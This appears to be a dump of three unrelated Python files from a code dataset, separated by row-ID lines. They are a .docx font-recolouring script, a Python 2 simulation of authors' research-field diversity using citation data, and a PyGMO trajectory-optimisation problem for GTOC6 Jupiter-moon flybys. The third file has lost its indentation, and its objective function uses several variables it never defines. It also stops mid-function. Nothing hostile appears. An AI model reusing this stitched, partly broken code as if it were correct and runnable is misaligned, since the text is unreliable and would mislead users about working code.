def main(filename_input, filename_output, c1=RGBColor(255, 0, 0), c2=RGBColor(45, 50, 0)):
    """Copy *filename_input* to *filename_output*, recoloring runs.

    Every run whose font color equals *c1* is rewritten with color *c2*;
    all other runs keep their color. Text content is preserved verbatim.
    """
    source = docx.Document(filename_input)
    target = docx.Document()
    for src_par in list(source.paragraphs):
        dst_par = target.add_paragraph()
        for src_run in src_par.runs:
            if src_run.font.color.rgb == c1:
                src_run.font.color.rgb = c2
            dst_run = dst_par.add_run()
            dst_run.text = src_run.text
            dst_run.font.color.rgb = src_run.font.color.rgb
    target.save(filename_output)
if __name__ == '__main__':
    # Demo: recolor grey runs of res.docx to red, writing test.docx.
    main('res.docx', 'test.docx', c1=RGBColor(125, 125, 125), c2=RGBColor(255, 0, 0))
|
984,668 | 788ebd9ce180618da5e9415d8613d16a5ff45437 | import matplotlib.pyplot as plt
import numpy as ny
import math
import os
from math import sqrt
import time
import operator
import random
import sys
from collections import deque
def pearsoncor(X, Y, code = 0):
    """Pearson's correlation coefficient of the paired samples X and Y.

    code
        0 - via deviations from the means (uses the sample sd's).
        1 - via the common raw-score formula.
    """
    n = len(X)
    # Sample sd's are computed unconditionally (and raise for n <= 1),
    # exactly as before, even though only code == 0 uses them.
    sx = ssd(X)
    sy = ssd(Y)
    xbar = float(sum(X)) / n
    ybar = float(sum(Y)) / n
    if code == 0:
        cov = sum([(x - xbar) * (y - ybar) for x, y in zip(X, Y)])
        return cov / (sx * sy * (n - 1.0))
    numer = sum([x * y for x, y in zip(X, Y)]) - n * (xbar * ybar)
    denom = sqrt((sum([x * x for x in X]) - n * xbar ** 2) * (sum([y * y for y in Y]) - n * ybar ** 2))
    return (numer / denom)
def svar(X):
    """Sample variance of X (denominator n - 1).

    Raises:
        ValueError: if X has fewer than two elements.
    """
    n = len(X)
    if n <= 1:
        # Fix: the py2-only `raise E, msg` form is replaced by the portable
        # call syntax, and the message now names this function (was "sd()").
        raise ValueError("svar(): n must be greater than 1")
    xbar = float(sum(X)) / n
    return sum((x - xbar) ** 2 for x in X) / (n - 1)
def ssd(X):
    """Sample standard deviation of X (square root of svar)."""
    variance = svar(X)
    return sqrt(variance)
def fieldhieararchy():
    """Load the field -> parent-field map from data/field_hierarchy.txt.

    Each line holds two whitespace-separated tokens: child parent.
    """
    mapping = {}
    with open('data/field_hierarchy.txt', 'r') as fh:
        for raw in fh:
            tokens = raw.strip().split()
            mapping[tokens[0]] = tokens[1]
    return mapping
def getcitesdict():
    """Build {lower-cased title: citation count} from data/domains_with_cites/*.

    Each line ends with a citation count token; a trailing parenthesised
    token before the count (e.g. a year) is dropped. Lines with fewer than
    two title tokens are skipped.
    """
    titles = {}
    skipped = 0  # count of too-short lines, kept for parity with the original
    for fname in os.listdir('data/domains_with_cites'):
        with open('data/domains_with_cites/' + fname, 'r') as fh:
            for raw in fh:
                tokens = raw.split()
                cites = tokens[-1]
                tokens = tokens[:-1]
                if len(tokens) < 2:
                    skipped = skipped + 1
                    continue
                if tokens[-1][0] == '(':
                    tokens = tokens[:-1]
                title = ' '.join(tokens).strip().lower()
                titles[title] = cites
    return titles
def authres(level=1):
    """Parse 'data/dataset_alltagged1' into per-paper / per-author tables.

    The input is a blank-line separated record file; each line's tag sits at
    position 1 ('t' year, 'i' paper index, '%' cited paper id, '@' comma
    separated authors, 'f' field, '*' title) -- inferred from the parsing
    below, TODO confirm against the data format.

    Returns (dyear, fielddict, dauths, imp, mscites, authglob, dauthresl):
      dyear     paper id -> publication year
      fielddict paper id -> field (only papers tagged with exactly one field)
      dauths    paper id -> list of authors
      imp       paper id -> number of papers citing it (in-degree)
      mscites   paper id -> MS citation count, or the string 'not_in_ms'
      authglob  author -> list of paper ids
      dauthresl author -> [(field, paper id, year, 1), ...]
    """
    readfile = open('data/dataset_alltagged1', 'r')
    thispaper = []          # lines of the record currently being buffered
    dyear = {}
    mscites = {}
    bestcoauth = {}         # NOTE(review): never filled or returned
    dauthresl = {}
    mscites = {}            # NOTE(review): duplicate initialisation (harmless)
    din = {}                # cited paper id -> list of citing paper ids
    imp = {}
    dcite = getcitesdict()
    dfield = fieldhieararchy()
    fielddict = {}  # fielddict[1234] = 'algo'
    dauths = {}     # dauths[1234] = ['jack','richard'...]
    authglob = {}
    firstauth = {}          # NOTE(review): never filled or returned
    for line in readfile:
        line = line.strip()
        if line == '':
            # Blank line: the record buffered in `thispaper` is complete.
            auths, fields, cites = [], [], []
            for a in thispaper:
                if a[1] == 't':
                    year = int(a[2:])
                elif a[1] == 'i':
                    index = a[6:]
                elif a[1] == '%':
                    cites.append(a[2:])
                elif a[1] == '@':
                    auths = a[2:].split(',')
                elif a[1] == 'f':
                    if level == 2:
                        # level 2 maps the fine field to its parent field
                        fields.append(dfield[a[2:]])
                    else:
                        fields.append(a[2:])
                elif a[1] == '*':
                    # normalise the title for the citation lookup
                    title = a[2:]
                    if title[-1] == '.':
                        title = title[:-1]
                    title = title.lower()
            # Only unambiguous (single-field) papers get a field assignment.
            if len(fields) == 1:
                fielddict[index] = fields[0]
            dauths[index] = auths
            dyear[index] = year
            for auth in auths:
                if auth != '':
                    auth = auth.replace(' ', '_')
                    if auth in authglob:
                        authglob[auth].append(index)
                    else:
                        authglob[auth] = [index]
            # MS citation count looked up by normalised title.
            if title in dcite:
                mscites[index] = int(dcite[title])
            else:
                mscites[index] = 'not_in_ms'
            for cite in cites:
                if cite not in din:
                    din[cite] = [index]
                else:
                    din[cite].append(index)
            for auth in auths:
                if auth != '':
                    auth = auth.replace(' ', '_')
                    if auth not in dauthresl:
                        dauthresl[auth] = []
                    for f in fields:
                        dauthresl[auth].append((f, index, year, 1))
            thispaper = []
            continue
        thispaper.append(line)
    # In-degree of every paper = how many buffered papers cite it.
    for i in dyear:
        sum = 0             # NOTE(review): shadows the builtin `sum`
        if i in din:
            for y in din[i]:
                sum += 1
        imp[i] = sum
    readfile.close()
    return (dyear, fielddict, dauths, imp, mscites, authglob, dauthresl)
def binspapers(n, level=1):
    """Split all papers into *n* chronological bins, earliest first.

    The first bin absorbs the remainder when the paper count is not an
    exact multiple of n. Returns the authres() tables plus the bins:
    (dyear, fielddict, dauths, imp, mscites, authglob, bins, dauthresl).
    """
    (dyear, fielddict, dauths, imp, mscites, authglob, dauthresl) = authres(level)
    bins = [[] for _ in range(n)]
    ordered = sorted([(pid, dyear[pid]) for pid in dyear], key=byyear)
    # Fix: use floor division -- plain `/` yields a float under Python 3,
    # breaking the slicing below; `//` behaves identically on Python 2.
    per_bin = len(ordered) // n
    remainder = len(ordered) % n
    # First bin takes its share plus the remainder.
    first = per_bin + remainder
    bins[0] = [pid for pid, _ in ordered[:first]]
    pos = first
    for b in range(1, n):
        bins[b] = [pid for pid, _ in ordered[pos:pos + per_bin]]
        pos += per_bin
    return (dyear, fielddict, dauths, imp, mscites, authglob, bins, dauthresl)
def byyear(t):
    """Sort key: the second element of *t*, coerced to int (a year)."""
    year = t[1]
    return int(year)
def getfields(level=1):
    """Return all known field names.

    level == 2 gives the distinct parent fields; any other level gives the
    fine-grained child fields.
    """
    hierarchy = fieldhieararchy()
    if level == 2:
        return list(set(hierarchy.values()))
    # Fix: wrap in list() -- callers index into the result, which fails on
    # Python 3 where dict.keys() is a view; identical behaviour on Python 2.
    return list(hierarchy.keys())
def normalizepref(ovals):
    """Normalise *ovals* in place so it sums to 1, return its cumulative sum.

    Mutates the input list; the return value is a numpy array whose last
    entry is 1.0 (up to float rounding).
    """
    # Fix: use the builtin sum -- the original shadowed it with a local
    # accumulator named `sum`.
    total = float(sum(ovals))
    for i in range(len(ovals)):
        ovals[i] = ovals[i] / total
    cumovals = ny.cumsum(ovals)
    return cumovals
def prefattach(circle):
    """Draw an index from the cumulative distribution *circle*.

    circle[i] is the cumulative probability up to choice i. When two
    consecutive bounds are equal, the tie is broken uniformly between the
    two indices. May return None if the draw falls outside every interval
    (not expected for a proper cumulative distribution).
    """
    r = random.random()
    last = len(circle) - 1
    for i, bound in enumerate(circle):
        if i == 0:
            if r < bound:
                return i
            continue
        if circle[i - 1] <= r < bound:
            if i < last and bound == circle[i + 1]:
                return random.choice([i, i + 1])
            return i
def getpreffield(d):
    """Sample a key of *d* with probability proportional to its value."""
    keys = []
    weights = []
    for key in d:
        keys.append(key)
        weights.append(d[key])
    cumulative = normalizepref(weights)
    chosen = prefattach(cumulative)
    return keys[chosen]
def updateauthdict(mauth, f, auths):
    """Increment the per-author count of field *f* for every author in *auths*.

    *mauth* maps author -> {field: paper count}; it is mutated in place and
    also returned for caller convenience.
    """
    for auth in auths:
        # setdefault/get replace the original's verbose lookup-and-reassign;
        # the reassignment was redundant since the inner dict was an alias.
        counts = mauth.setdefault(auth, {})
        counts[f] = counts.get(f, 0) + 1
    return mauth
def updatetotcitedict(mauthc, ncites, f, auths):
    """Add *ncites* to each listed author's running citation total.

    *f* is accepted for signature compatibility with updateauthdict but is
    unused. *mauthc* is mutated in place and also returned.
    """
    for auth in auths:
        mauthc[auth] = mauthc.get(auth, 0) + ncites
    return mauthc
def basic4(n, k0, rand, level=1):  # weightage to authors who got more total cites
    """Simulate field choice for papers, seeded with real data.

    The first *k0* of *n* chronological bins keep their real fields; later
    papers pick a field preferentially from their co-authors' histories,
    each co-author weighted by accumulated citations. With probability
    *rand* (or when no co-author history exists) a uniformly random field
    is used instead. Writes the synthetic author histories to
    data/authresearch_1 and returns (mscites, dauthresl, imp, mfield, fielddict).
    """
    (dyear, fielddict, dauths, imp, mscites, authglob, bins, dauthresl) = binspapers(n, level)
    writefile = open('data/authresearch_1', 'w')
    allf = getfields(level)
    mfield = {}   # paper id -> field assigned by the model
    mauth = {}    # author -> {field: #papers in that field so far}
    mauthc = {}   # author -> total citations accumulated so far
    count, count1 = 0, 0
    mc, mc1 = 0, 0  # hit/miss counters: does the top co-author's main field match reality?
    # Seed phase: the first k0 bins keep their real field assignments.
    for i in range(k0):
        for paper in bins[i]:
            f = fielddict[paper]
            mfield[paper] = f
            if mscites[paper] == 'not_in_ms':
                ncites = imp[paper]
            else:
                ncites = max(mscites[paper], imp[paper])
            mauth = updateauthdict(mauth, f, dauths[paper])
            mauthc = updatetotcitedict(mauthc, ncites, f, dauths[paper])
            count1 += 1
    random.seed()
    # Simulation phase for the remaining bins.
    for i in range(k0, n):
        for paper in bins[i]:
            r = random.random()
            if r >= rand:
                # d: field -> citation-weighted preference; d2: raw counts.
                d, d2 = {}, {}
                den, c1 = 0, -1
                maxauth = ''
                for auth in dauths[paper]:
                    if auth in mauthc:
                        if mauthc[auth] > c1:
                            maxauth = auth
                            c1 = mauthc[auth]
                        den += mauthc[auth]
                if den > 0:
                    for auth in dauths[paper]:
                        if auth in mauth:
                            d1 = mauth[auth]
                            num = mauthc[auth]
                            for j in d1:
                                if j in d:
                                    d[j] += d1[j] * (float(num) / den)
                                    d2[j] += d1[j]
                                else:
                                    d[j] = d1[j] * (float(num) / den)
                                    d2[j] = d1[j]
                if len(d) > 0:
                    # Preferential draw from the weighted field distribution.
                    f = getpreffield(d)
                    realf = fielddict[paper]
                    dex = mauth[maxauth]
                    maxf = max(dex.iteritems(), key=operator.itemgetter(1))[0]
                    if maxf == realf:
                        mc += 1
                    else:
                        mc1 += 1
                    count += 1
            if r < rand or len(d) == 0:
                # Fallback: uniformly random field.
                r1 = random.randint(0, len(allf) - 1)
                f = allf[r1]
            mfield[paper] = f
            mauth = updateauthdict(mauth, f, dauths[paper])
            if mscites[paper] == 'not_in_ms':
                ncites = imp[paper]
            else:
                ncites = mscites[paper]
            mauthc = updatetotcitedict(mauthc, ncites, f, dauths[paper])
    #print str(mc),str(mc1),str(float(mc)/(mc+mc1))
    # Dump author -> field@year@indegree@mscites records.
    for auth in authglob:
        writefile.write(auth + ' ')
        for index in authglob[auth]:
            writefile.write(mfield[index] + '@' + str(dyear[index]) + '@' + str(imp[index]) + '@' + str(mscites[index]) + ' ')
        writefile.write('\n')
    writefile.close()
    return (mscites, dauthresl, imp, mfield, fielddict)
def degreedist(l, x, flag):
    """Histogram the values in *l* over b=10 equal-width buckets.

    If *flag* is true the bucket upper edges are computed from min/max of
    *l* and appended to *x*; otherwise the edges already in *x* are reused,
    so two samples can share one grid.

    Returns (x, x1, y): edges, bucket mid points, normalised frequencies.
    """
    b = 10
    y = []
    buck = float(max(l) - min(l)) / b   # bucket width
    i = min(l)
    if flag: x.append(i + buck)
    y.append(0)
    for j in range(1, b):
        if flag: x.append(x[j - 1] + buck)
        y.append(0)
    # Assign every value to its bucket.
    for j in l:
        for k in range(b):
            if k == 0 and j < x[k]:
                y[k] += 1
                break
            if x[k - 1] <= j < x[k]:
                y[k] += 1
                break
            if k == b - 1 and j == x[k]:
                # A value equal to the very top edge lands in the last
                # bucket. NOTE(review): a value above x[b-1] (possible via
                # float rounding, or when reusing another sample's grid) is
                # silently dropped -- confirm that is acceptable.
                y[k] += 1
    # Mid points. NOTE(review): x1[0] is x[0]/2, i.e. the midpoint of
    # [0, x[0]] rather than [min(l), x[0]] -- confirm intended.
    x1 = [float(x[0]) / 2]
    for i in range(1, b):
        x1.append(float(x[i] + x[i - 1]) / 2)
    # Normalise counts to fractions.
    s = sum(y)
    for i in range(len(y)):
        y[i] = float(y[i]) / s
    return (x, x1, y)
def plotlines1(l, l1, flag, wl):
    """Bin both samples (each on its own grid) and correlate the histograms.

    *flag* and *wl* are accepted for signature compatibility but unused.
    Returns (mid points of l1's grid, l1's densities, pearson correlation).
    """
    _edges0, _centers0, density0 = degreedist(l, [], True)
    _edges1, centers1, density1 = degreedist(l1, [], True)
    return (centers1, density1, pearsoncor(density0, density1))
def bothdiv2(n, k0, rand, wl, mw, enttype, level=1):
    """Run the model (basic4) and compare real vs model diversity.

    *mw* is accepted for signature compatibility but unused. Returns the
    (centers, densities, correlation) triple from plotlines1.
    """
    w = 2  # window used by the plain-entropy variant (for pearsoncorr)
    basic4(n, k0, rand, level)  # writes data/authresearch_1; return value unused
    if enttype == 'windowentropy':
        real = windowentropy(wl, 1, level)
        model = windowentropy(wl, 0, level)
    else:
        real = plaindiv(w, 1, level)
        model = plaindiv(w, 0, level)
    return plotlines1(real.values(), model.values(), 1, wl)
def bothdiv(enttype):
    """Average the model diversity histogram over `its` runs, plot it
    against the real-data histogram and print the mean correlation.
    """
    # NOTE(review): these config locals are never used below -- the
    # bothdiv2 call hardcodes (100, 10, 0, 5, 5, enttype, 1).
    nl = [100]
    randl = [0]
    wl = [5]
    mw = [5]
    level = 1
    its = 1
    le = -1
    x, y = [], []
    cov = 0
    for j in range(its):
        print str(j)
        xp1, yp1, corv1 = bothdiv2(100, 10, 0, 5, 5, enttype, 1)
        print str(xp1)
        if len(x) == 0:
            # First run initialises the running averages.
            for i in range(len(xp1)):
                x.append(xp1[i])
                y.append(yp1[i])
            cov = corv1
            le = len(x)
        else:
            # Incremental mean over runs.
            for i in range(le):
                x[i] = float((j * x[i]) + xp1[i]) / (j + 1)
                y[i] = float((j * y[i]) + yp1[i]) / (j + 1)
            cov = float((j * cov) + corv1) / (j + 1)
    plotlines2(x, y, enttype)
    print 'Covariance: ' + str(cov)
    return
def plot2text(fname, x, y):
    """Append series *x* and *y* to output_<fname>.

    Each series becomes one line of space-separated values (with a trailing
    space); the pair is terminated by a blank line so successive dumps stay
    separated.
    """
    with open('output_' + fname, 'a') as out:
        out.write(''.join(str(v) + ' ' for v in x) + '\n')
        out.write(''.join(str(v) + ' ' for v in y) + '\n\n')
    return
def plotlines2(xm, ym, enttype):
    """Plot the real-data diversity histogram against the model curve and
    dump both series to output_<enttype>.txt."""
    if enttype == 'windowentropy':
        real = windowentropy(5, 1, 1)  # window entropy of the real data
    else:
        real = plaindiv(2, 1, 1)       # plain entropy of the real data
    _edges, centers, density = degreedist(real.values(), [], True)
    plt.figure()
    plt.plot(centers, density, 'g-', xm, ym, 'r-')
    plot2text(enttype + '.txt', centers, density)
    plot2text(enttype + '.txt', xm, ym)
    plt.legend(['real-data', 'model-data'])
    plt.ylabel('Fraction of Authors')
    plt.xlabel(enttype)
    plt.show()
    return
def caldiversity(d, flag = 0):
    """Shannon entropy of the distribution stored in dict *d*.

    flag == 0: each value is a collection; its length is the weight.
    flag != 0: each value is a numeric weight; non-positive weights are ignored.

    Returns 0 for a degenerate (single-outcome) distribution.
    """
    if flag == 0:
        weights = [len(v) for v in d.values()]
    else:
        # Fix: the original skipped non-positive weights in the total but
        # then re-added the PREVIOUS term (stale `f`) for them in the
        # entropy loop; they are now skipped consistently.
        weights = [v for v in d.values() if v > 0]
    total = sum(weights)  # builtin sum; the original shadowed it with a local
    res = 0
    for w in weights:
        p = float(w) / total
        res += p * math.log(p)
    # res is <= 0; negate a non-zero value (avoids returning -0.0).
    if res != 0:
        res = -1 * res
    return res
def getresdict(flag, level=1):
    """Load author -> chronologically sorted [(field, year, indeg, mscites)].

    flag == 1 reads the real histories ('data/authresearch_data');
    otherwise the model output written by basic4 ('data/authresearch_1').
    Records on each line are '@'-separated tuples, sorted by year (byyear).

    NOTE(review): the original indentation was ambiguous here; as written,
    flag == 1 with level != 1 leaves `readfile` unbound (NameError) --
    confirm which file a level-2 real-data run should read.
    """
    if flag == 1:
        if level == 1: readfile = open('data/authresearch_data', 'r')
    else:
        readfile = open('data/authresearch_1', 'r')
    d = {}
    for line in readfile:
        line = line.strip()
        line = line.split()
        if line[0] != '':
            # First token is the author; the rest are field@year@imp@ms records.
            d[line[0]] = []
            for s in line[1:]:
                ls = s.split('@')
                d[line[0]].append(tuple(ls))
            # Sort each author's records chronologically.
            ls = d[line[0]]
            ls = sorted(ls, key=byyear)
            d[line[0]] = ls
    readfile.close()
    return d
def plaindiv(w, flag, level=1):
    """Entropy of each author's overall field distribution.

    Authors with fewer than *w* records are skipped. Returns
    {author: entropy}. *flag*/*level* are forwarded to getresdict.
    """
    records = getresdict(flag, level)
    entropies = {}
    for auth in records:
        recs = records[auth]
        if len(recs) < w:
            continue
        # Count how often each field occurs in the author's history.
        field_counts = {}
        for field, _year, _imp, _ms in recs:
            field_counts[field] = field_counts.get(field, 0) + 1
        # Cleanup vs original: dead locals (prev/sum/k and an unused result
        # list) removed, and the entropy is computed once instead of twice.
        entropies[auth] = caldiversity(field_counts, 1)
    return entropies
def windowentropy(w, flag, level=1):
    """Mean entropy over all length-*w* sliding windows of each author's
    chronological publication sequence.

    Authors with fewer than *w* records are skipped. Returns
    {author: mean window entropy}.
    """
    records = getresdict(flag, level)
    result = {}
    for auth in records:
        recs = records[auth]
        if len(recs) < w:
            continue
        # Field counts of the first window recs[0:w].
        counts = {}
        for field, _y, _i, _m in recs[:w]:
            counts[field] = counts.get(field, 0) + 1
        total = caldiversity(counts, 1)
        k = 1
        # Slide the window one step at a time.
        # Fix: the original started the incoming index at w-1, re-counting
        # the last element of the first window instead of adding element w
        # (and thus also averaging over one window too many).
        left, right = 0, w
        while right < len(recs):
            outgoing = recs[left][0]
            counts[outgoing] -= 1
            if counts[outgoing] == 0:
                # Drop exhausted fields so the entropy code never sees
                # zero weights.
                del counts[outgoing]
            incoming = recs[right][0]
            counts[incoming] = counts.get(incoming, 0) + 1
            total += caldiversity(counts, 1)
            k += 1
            left += 1
            right += 1
        result[auth] = float(total) / k
    return result
def main(enttype):
    """Entry point: run the diversity comparison for the given entropy type.

    Valid values are 'windowentropy' and 'plainentropy'; anything else
    prints a usage message.
    """
    if (enttype == 'windowentropy') or (enttype == 'plainentropy'):
        bothdiv(enttype)
        return
    print 'Invalid argument. Valid arg are windowentropy or plainentropy'
if __name__ == '__main__':
    # Expect the entropy flavour as the sole CLI argument.
    if len(sys.argv) > 1:
        main(sys.argv[1])
    else: print 'Enter an argument. Valid arg are windowentropy or plainentropy'
984,669 | 9a79ffeba0077b0ff8e01def70ba94ac06e147e0 | from PyGMO.problem import base as base_problem
from PyKEP import epoch,DAY2SEC,planet_ss,MU_SUN,lambert_problem,propagate_lagrangian,fb_prop, AU, closest_distance
from math import pi, cos, sin, acos
import math
from scipy.linalg import norm
from gtoc6 import europa, io, JR, MU_JUPITER
import numpy as np
from numpy import linalg
class mga_incipit(base_problem):
"""
A PyGMO global optimization problem (box-bounded, continuous) representing the gtoc6 preliminary trajectory capture (single and multi-objective)
Decision vector:
[t0,u,v,T,a0] + [beta1, rp1/rP1, eta1,a1] + ....
Each leg time-of-flight can be obtained as T(n) = a(n)/(sum(a(i)))*T, T(n-1)= a(n-1)/(sum(a(i)))*T
---Aurelie 27-09-12
"""
def __init__(self,
seq = [io,io,europa],
t0 = [epoch(7305.0),epoch(11322.0)],
tof = [200,500],
multi_objective = False
):
"""
* seq: list of jupiter moons defining the trajectory incipit
* t0: list of two epochs defining the launch window
* tof: list of n lists containing the lower and upper bounds for the legs flight times (days)
"""
self.__n_legs = len(seq)
self.tof = tof
#dim = 5+4 * self.__n_legs-1
dim = 5+4*(len(seq)-1)
obj_dim = multi_objective + 1
#First we call the constructor for the base PyGMO problem
#As our problem is n dimensional, box-bounded (may be multi-objective), we write
#(dim, integer dim, number of obj, number of con, number of inequality con, tolerance on con violation)
super(mga_incipit,self).__init__(dim,0,obj_dim,0,0,0)
#We then define all planets in the sequence and the common central body gravity as data members
self.seq = seq
self.common_mu = seq[0].mu_central_body
#And we compute the bounds
lb = [t0[0].mjd2000,0.0,0.0,tof[0],1e-5]
ub = [t0[1].mjd2000,1.0,1.0,tof[1],1-1e-5]
for i in range(1, self.__n_legs):
lb = lb + [-2*pi ,1.1 , 1e-5 , 1e-5]
ub = ub + [2*pi ,30.0, 1-1e-5, 1-1e-5]
#Accounting for the fly-bys altitudes
for i,pl in enumerate(seq[0:-1]):
lb[6+4*i] = pl.safe_radius / pl.radius
ub[6+4*i] = (pl.radius + 2000000) / pl.radius
#And we set them
self.set_bounds(lb,ub)
#Objective function
def _objfun_impl(self,x):
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
#sum_alpha = 0
#for i in range(self.__n_legs-1):
# sum_alpha = sum_alpha+x[4+4*i]
#for i in xrange(self.__n_legs-1):
# T[i] = (x[4+4*i]/sum_alpha)*x[3]
for i in xrange(0,self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#print "\tDuration: " + str(T) + "days"
#return(T,)
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
tmp2, ra2 = closest_distance(r,v_beg_l, r_P[i], v_end_l, self.common_mu)
if tmp < tmp2:
close_d[i] = tmp/JR
ra = ra/JR
else:
close_d[i] = tmp2/JR
ra = ra2/JR
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
coeff = 0.3
for i in xrange(0,self.__n_legs):
ratio[i] = (DV[i]/(T[i]*DAY2SEC))
DV_2rj[i] = DV[i] + max((2.0-close_d[i]),0.0)*1000 + max((ratio[i]-coeff*(0.1/2000)),0.0)*100
T_2rj[i] = T[i] + max((2.0-close_d[i]),0.0)*1000 + max((ratio[i]-coeff*(0.1/2000)),0.0)*100
#if self.f_dimension == 1:
# return (sum(DV)
#else:
# return (sum(DV), sum(T))
if self.f_dimension == 1:
return (sum(DV_2rj))
else:
return (sum(DV_2rj), sum(T_2rj))
def pretty(self,x):
"""
Prints human readable information on the trajectory represented by the decision vector x
Example::
prob.pretty(x)
"""
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
for i in xrange(self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
close_d = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
close_d[0] = closest_distance(r,v_beg_l, r_P[0], v_end_l, self.common_mu)[0] / JR
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
print "\nFirst Leg: 1000JR to " + self.seq[0].name
print "\tDeparture: " + str(t_P[0]) + " (" + str(t_P[0].mjd2000) + " mjd2000) "
print "\tDuration: " + str(T[0]) + "days"
print "\tInitial Velocity Increment (m/s): " + str(DV[0])
print "\tArrival relative velocity at " + self.seq[0].name +" (m/s): " + str(norm([a-b for a,b in zip(v_end_l,v_P[0])]))
print "\tClosest approach distance: " + str(close_d[0])
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu)
tmp, ra = closest_distance(r_P[i-1],v_out, r,v, self.common_mu)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
tmp2, ra2 = closest_distance(r,v_beg_l, r_P[i], v_end_l, self.common_mu)
if tmp < tmp2:
close_d[i] = tmp/JR
ra = ra/JR
else:
close_d[i] = tmp2/JR
ra = ra2/JR
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
print "\nleg no. " + str(i+1) + ": " + self.seq[i-1].name + " to " + self.seq[i].name
print "\tDuration (days): " + str(T[i])
print "\tFly-by epoch: " + str(t_P[i]) + " (" + str(t_P[i].mjd2000) + " mjd2000) "
print "\tFly-by altitude (km): " + str((x[6+(i-1)*4]*self.seq[i-1].radius-self.seq[i-1].radius)/1000)
print "\tDSM after (days): " + str(x[7+(i-1)*4]*T[i])
print "\tDSM magnitude (m/s): " + str(DV[i])
print "\tClosest approach distance: " + str(close_d[i])
print "\tApoapsis at closest distance: " + str(ra)
print "\tV in (m/s): " + str(v_end_l)
print "\tV out (m/s): " + str(v_out)
print "\nArrival at " + self.seq[-1].name
vel_inf = [a-b for a,b in zip(v_end_l,v_P[-1])]
print "Arrival epoch: " + str(t_P[-1]) + " (" + str(t_P[-1].mjd2000) + " mjd2000) "
print "Arrival Vinf (m/s): " + vel_inf.__repr__() + " - " + str(norm(vel_inf))
print "Total mission time (days): " + str(sum(T))
print "Total DV (m/s): " + str(sum(DV))
#Plot of the trajectory
def plot(self,x):
"""
Plots the trajectory represented by the decision vector x
Example::
prob.plot(x)
"""
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from PyKEP.orbit_plots import plot_planet, plot_lambert, plot_kepler
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.scatter(0,0,0, color='y')
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
for i in xrange(self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
plot_planet(ax, planet, t0=t_P[i], color=(0.8,0.6,0.8), legend=True, units = JR)
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
